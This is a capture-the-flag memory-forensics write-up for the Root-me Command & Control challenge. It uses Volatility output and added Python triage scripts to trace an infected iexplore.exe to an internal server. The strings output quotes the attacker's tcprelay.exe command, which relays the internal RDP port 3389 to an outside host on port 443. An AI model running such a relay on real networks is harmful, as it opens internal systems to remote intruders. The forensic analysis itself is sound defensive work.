Root-me.org

Command & Control - Level 4

Malware Analysis

We now know that iexplore.exe is the malware. Now we need to figure out the IP of the internal server used by the hackers.

So let's go back to the process list.

vol.py --profile=Win7SP1x86 -f ch2.dmp pslist
Volatility Foundation Volatility Framework 2.6
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87978b78 System                    4      0    103     3257 ------      0 2013-01-12 16:38:09 UTC+0000                                 
0x88c3ed40 smss.exe                308      4      2       29 ------      0 2013-01-12 16:38:09 UTC+0000                                 
0x8929fd40 csrss.exe               404    396      9      469      0      0 2013-01-12 16:38:14 UTC+0000                                 
0x892ac2b8 wininit.exe             456    396      3       77      0      0 2013-01-12 16:38:14 UTC+0000                                 
0x88d03a00 csrss.exe               468    448     10      471      1      0 2013-01-12 16:38:14 UTC+0000                                 
0x892ced40 winlogon.exe            500    448      3      111      1      0 2013-01-12 16:38:14 UTC+0000                                 
0x896294c0 services.exe            560    456      6      205      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x896427b8 lsass.exe               576    456      6      566      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x8962f7e8 lsm.exe                 584    456     10      142      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x8962f030 svchost.exe             692    560     10      353      0      0 2013-01-12 16:38:21 UTC+0000                                 
0x897b5c20 svchost.exe             764    560      7      263      0      0 2013-01-12 16:38:23 UTC+0000                                 
0x89805420 svchost.exe             832    560     19      435      0      0 2013-01-12 16:38:23 UTC+0000                                 
0x89852918 svchost.exe             904    560     17      409      0      0 2013-01-12 16:38:24 UTC+0000                                 
0x8986b030 svchost.exe             928    560     26      869      0      0 2013-01-12 16:38:24 UTC+0000                                 
0x898911a8 svchost.exe            1084    560     10      257      0      0 2013-01-12 16:38:26 UTC+0000                                 
0x898b2790 svchost.exe            1172    560     15      475      0      0 2013-01-12 16:38:27 UTC+0000                                 
0x898a7868 AvastSvc.exe           1220    560     66     1180      0      0 2013-01-12 16:38:28 UTC+0000                                 
0x8a0f9c40 spoolsv.exe            1712    560     14      338      0      0 2013-01-12 16:38:58 UTC+0000                                 
0x8a102748 svchost.exe            1748    560     18      310      0      0 2013-01-12 16:38:58 UTC+0000                                 
0x88cded40 sppsvc.exe             1872    560      4      143      0      0 2013-01-12 16:39:02 UTC+0000                                 
0x8a1d84e0 vmtoolsd.exe           1968    560      6      220      0      0 2013-01-12 16:39:14 UTC+0000                                 
0x9541c7e0 wlms.exe                336    560      4       45      0      0 2013-01-12 16:39:21 UTC+0000                                 
0x8a1f5030 VMUpgradeHelpe          448    560      4       89      0      0 2013-01-12 16:39:21 UTC+0000                                 
0x9542a030 TPAutoConnSvc.         1612    560      9      135      0      0 2013-01-12 16:39:23 UTC+0000                                 
0x87ac0620 taskhost.exe           2352    560      8      149      1      0 2013-01-12 16:40:24 UTC+0000                                 
0x87ad44d0 dwm.exe                2496    904      5       77      1      0 2013-01-12 16:40:25 UTC+0000                                 
0x87ac6030 explorer.exe           2548   2484     24      766      1      0 2013-01-12 16:40:27 UTC+0000                                 
0x87ae2880 TPAutoConnect.         2568   1612      5      146      1      0 2013-01-12 16:40:28 UTC+0000                                 
0x87a9c288 conhost.exe            2600    468      1       35      1      0 2013-01-12 16:40:28 UTC+0000                                 
0x87b82438 VMwareTray.exe         2660   2548      5       80      1      0 2013-01-12 16:40:29 UTC+0000                                 
0x87aa9220 VMwareUser.exe         2676   2548      8      190      1      0 2013-01-12 16:40:30 UTC+0000                                 
0x87b784b0 AvastUI.exe            2720   2548     14      220      1      0 2013-01-12 16:40:31 UTC+0000                                 
0x898fe8c0 StikyNot.exe           2744   2548      8      135      1      0 2013-01-12 16:40:32 UTC+0000                                 
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x898fbb18 SearchIndexer.         2900    560     13      636      0      0 2013-01-12 16:40:38 UTC+0000                                 
0x87bd35b8 wmpnetwk.exe           3176    560      9      240      0      0 2013-01-12 16:40:48 UTC+0000                                 
0x89f3d2c0 svchost.exe            3352    560      9      141      0      0 2013-01-12 16:40:58 UTC+0000                                 
0x87c6a2a0 swriter.exe            3452   2548      1       19      1      0 2013-01-12 16:41:01 UTC+0000                                 
0x87ba4030 soffice.exe            3512   3452      1       28      1      0 2013-01-12 16:41:03 UTC+0000                                 
0x95483d18 soffice.bin            3556   3544      0 --------      1      0 2013-01-12 16:41:05 UTC+0000   2013-01-12 16:41:39 UTC+0000  
0x87b8ca58 soffice.bin            3564   3512     12      400      1      0 2013-01-12 16:41:05 UTC+0000                                 
0x89f1d3e8 svchost.exe            3624    560     14      348      0      0 2013-01-12 16:41:22 UTC+0000                                 
0x95495c18 taskmgr.exe            1232   2548      6      116      1      0 2013-01-12 16:42:29 UTC+0000                                 
0x87bf7030 cmd.exe                3152   2548      1       23      1      0 2013-01-12 16:44:50 UTC+0000                                 
0x87c595b0 conhost.exe            3228    468      2       54      1      0 2013-01-12 16:44:50 UTC+0000                                 
0x89898030 cmd.exe                1616   2772      2      101      1      0 2013-01-12 16:55:49 UTC+0000                                 
0x954826b0 conhost.exe            2168    468      2       49      1      0 2013-01-12 16:55:50 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 
0x87c90d40 audiodg.exe            1720    832      5      117      0      0 2013-01-12 16:58:11 UTC+0000                                 
0x87cbfd40 winpmem-1.3.1.         3144   3152      1       23      1      0 2013-01-12 16:59:17 UTC+0000                                 

We got 3 iexplore processes.

vol.py --profile=Win7SP1x86 -f ch2.dmp pslist |  grep iexplore
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 

We can start by checking whether any of the iexplore processes is the parent of other processes.

vol.py --profile=Win7SP1x86 -f ch2.dmp pslist |  grep -e "3044" -e "2772" -e "1136"
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x89898030 cmd.exe                1616   2772      2      101      1      0 2013-01-12 16:55:49 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 

There's a cmd.exe (PID 1616) whose parent is 2772, the first iexplore.exe.
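To make the parent/child lookup above systematic, here is an added Python example (not part of the original writeup and not Volatility code) that parses pslist text output into a process tree and flags a browser that is the direct parent of a command shell, which is exactly the 2772 → 1616 pattern seen here. The sample rows are copied from the pslist output above; the browser and shell name lists are an assumed heuristic of my own.

```python
"""Build a parent/child tree from Volatility pslist output and flag
browser processes that spawn a command shell (added example)."""
import re
from collections import defaultdict

# Constructed sample: the relevant rows copied from the pslist output above.
PSLIST_SAMPLE = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87ac6030 explorer.exe           2548   2484     24      766      1      0 2013-01-12 16:40:27 UTC+0000
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000
0x87bf7030 cmd.exe                3152   2548      1       23      1      0 2013-01-12 16:44:50 UTC+0000
0x89898030 cmd.exe                1616   2772      2      101      1      0 2013-01-12 16:55:49 UTC+0000
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000
0x87cbfd40 winpmem-1.3.1.         3144   3152      1       23      1      0 2013-01-12 16:59:17 UTC+0000
"""

# Offset, name, PID and PPID are the first four whitespace-separated columns.
ROW_RE = re.compile(r"^(0x[0-9a-f]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+")

# Assumed heuristic lists: a browser directly spawning a shell is unusual.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_pslist(text):
    """Return {pid: (name, ppid)} for every process row in pslist output."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            _, name, pid, ppid = m.groups()
            procs[int(pid)] = (name, int(ppid))
    return procs


def children_of(procs):
    """Invert the parent map: {ppid: [pid, ...]}."""
    kids = defaultdict(list)
    for pid, (_, ppid) in procs.items():
        kids[ppid].append(pid)
    return kids


def descendants(procs, root):
    """All PIDs below `root` in the tree (depth-first order)."""
    kids = children_of(procs)
    out, stack = [], list(kids.get(root, []))
    while stack:
        pid = stack.pop()
        out.append(pid)
        stack.extend(kids.get(pid, []))
    return out


def browser_spawned_shells(procs):
    """(browser_pid, shell_pid) pairs where a browser is a shell's direct parent."""
    hits = []
    for pid, (name, ppid) in procs.items():
        parent = procs.get(ppid)
        if name.lower() in SHELLS and parent and parent[0].lower() in BROWSERS:
            hits.append((ppid, pid))
    return sorted(hits)


def render_tree(procs, root, indent=0):
    """Text rendering of the subtree under `root`, one line per process."""
    lines = [f"{'  ' * indent}{procs[root][0]} ({root})"]
    for kid in sorted(children_of(procs).get(root, [])):
        lines.extend(render_tree(procs, kid, indent + 1))
    return lines


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_SAMPLE)
    print("\n".join(render_tree(procs, 2548)))
    for browser, shell in browser_spawned_shells(procs):
        print(f"suspicious: {procs[browser][0]} {browser} spawned {procs[shell][0]} {shell}")
```

Feeding the full `pslist` output to `parse_pslist` instead of the sample gives the whole tree; `browser_spawned_shells` then points straight at the one cmd.exe worth following.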

Let's run the cmdscan plugin to see the commands that were run.

Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x2ff638 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 5 LastAdded: 4 LastDisplayed: 4
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #0 @ 0x2fcd58: cd %temp%
Cmd #1 @ 0x2fd348: dir
Cmd #2 @ 0x2e1038: cd imagedump
Cmd #3 @ 0x2fd378: dir
Cmd #4 @ 0x304870: winpmem-1.3.1.exe ram.dmp
Cmd #12 @ 0x2d0038: 0?0^B
Cmd #36 @ 0x2d00c4: /?0?-???-
Cmd #37 @ 0x2fc1a8: 0?-???????/^A
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x3007a8 Application: winpmem-1.3.1.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x90
**************************************************
CommandProcess: conhost.exe Pid: 2168
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #6 @ 0x350039: ??????????????????????h??????????????^A [long run of unprintable bytes truncated] ^A
Cmd #16 @ 0x330035: ?
Cmd #36 @ 0x4000c4: A?B?@???@
Cmd #37 @ 0x4140f0: B?@????

There's nothing interesting here. Another plugin, consoles, shows the full console input and output rather than just the command history:

...
ConsoleProcess: conhost.exe Pid: 2168
Console: 0x1081c0 CommandHistorySize: 50
HistoryBufferCount: 3 HistoryBufferMax: 4
OriginalTitle: %SystemRoot%\system32\cmd.exe
Title: C:\Windows\system32\cmd.exe
AttachedProcess: cmd.exe Pid: 1616 Handle: 0x64
----
CommandHistory: 0x427a60 Application: tcprelay.exe Flags: 
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427890 Application: whoami.exe Flags: 
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64

A tcprelay.exe application was executed from this console. The attached cmd.exe has PID 1616, exactly the PID we saw before as the child of iexplore.exe 2772.

We'll run strings on the dump and grep for tcprelay to see where that word appears.

strings ch2.dmp | grep tcprelay
  tcprelay.exe
  tcprelay.exe
  tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.c
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
  tcprelay.exe
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
01/12/2013  05:57 PM            22,078 tcprelay.exe
mp\TEMP23\tcprelay.exe
 Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
01/12/2013  05:57 PM            22,078 tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 

I think we got it: tcprelay.exe is launched with `192.168.0.22 3389 yourcsecret.co.tv 443`, so the internal server is 192.168.0.22 and the service being relayed is RDP (port 3389).
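The strings output above is noisy: the same command line appears many times, and several path hits carry trailing binary junk. As an added Python example (not part of the original writeup), the block below deduplicates the hits, parses the relay command line into its fields, and checks whether the relayed host is an RFC 1918 address, which is the "internal server" question this level asks. The sample lines are copied from the strings output above; the `<binary> <ipv4> <port> <host> <port>` argument shape and the port-to-service table are assumptions based on what the dump shows.

```python
"""Triage `strings | grep tcprelay` hits: deduplicate lines, parse the relay
command line and its file paths, and flag an internal (RFC 1918) target
(added example)."""
import ipaddress
import re
from collections import Counter

# Constructed sample: a subset of the strings output above, including the
# repeated lines and the hits with trailing junk bytes.
STRINGS_SAMPLE = (
    "  tcprelay.exe\n"
    "tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 \n"
    "tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 \n"
    "tcprelay.c\n"
    "C:\\Users\\JOHNDO~1\\AppData\\Local\\Temp\\TEMP23\\tcprelay.exeg[j\n"
    "\\Users\\John Doe\\AppData\\Local\\Temp\\TEMP23\\tcprelay.exe\n"
    "5C:\\Users\\JOHNDO~1\\AppData\\Local\\Temp\\TEMP23\\tcprelay.exeg[j\n"
    "01/12/2013  05:57 PM            22,078 tcprelay.exe\n"
    "tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 \n"
    "C:\\Users\\John Doe\\AppData\\Local\\Temp\\TEMP23\\tcprelay.exeN_\n"
)

# Assumed argument shape: <binary> <ipv4> <port> <host> <port>.
RELAY_RE = re.compile(
    r"^(\S+\.exe)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\s+(\S+)\s+(\d+)$"
)
# A Windows path ending in tcprelay.exe; leading and trailing junk bytes
# fall outside the match because components are backslash-delimited.
PATH_RE = re.compile(r"(?:[A-Za-z]:)?\\(?:[^\\\n]+\\)+tcprelay\.exe")

# Assumed port labels for the summary.
WELL_KNOWN_PORTS = {3389: "rdp", 443: "https", 22: "ssh", 445: "smb"}


def dedupe_hits(text):
    """Count each distinct (stripped) strings hit so repeats collapse."""
    return Counter(line.strip() for line in text.splitlines() if line.strip())


def parse_relay_cmdline(line):
    """Parse one relay command line into fields; None if it is not one."""
    m = RELAY_RE.match(line.strip())
    if not m:
        return None
    binary, src_host, src_port, dst_host, dst_port = m.groups()
    try:
        src_private = ipaddress.ip_address(src_host).is_private
    except ValueError:  # digits matched but not a valid IPv4 address
        return None
    src_port, dst_port = int(src_port), int(dst_port)
    return {
        "binary": binary,
        "src_host": src_host,
        "src_port": src_port,
        "src_service": WELL_KNOWN_PORTS.get(src_port, "unknown"),
        "src_is_private": src_private,
        "dst_host": dst_host,
        "dst_port": dst_port,
        "dst_service": WELL_KNOWN_PORTS.get(dst_port, "unknown"),
    }


def extract_relays(text):
    """Unique parsed relay command lines found in the strings output."""
    found = []
    for line in dedupe_hits(text):
        parsed = parse_relay_cmdline(line)
        if parsed and parsed not in found:
            found.append(parsed)
    return found


def extract_paths(text):
    """Unique on-disk paths of the binary, junk bytes stripped."""
    return sorted(set(PATH_RE.findall(text)))


if __name__ == "__main__":
    for line, n in dedupe_hits(STRINGS_SAMPLE).most_common():
        print(f"{n:3d}  {line}")
    for relay in extract_relays(STRINGS_SAMPLE):
        print(relay)
    for path in extract_paths(STRINGS_SAMPLE):
        print(path)
```

Running it over the real `strings ch2.dmp | grep tcprelay` output collapses the repeats to a handful of distinct facts: one command line, an RFC 1918 source host on the RDP port, an external hostname on 443, and the drop location under the user's Temp directory.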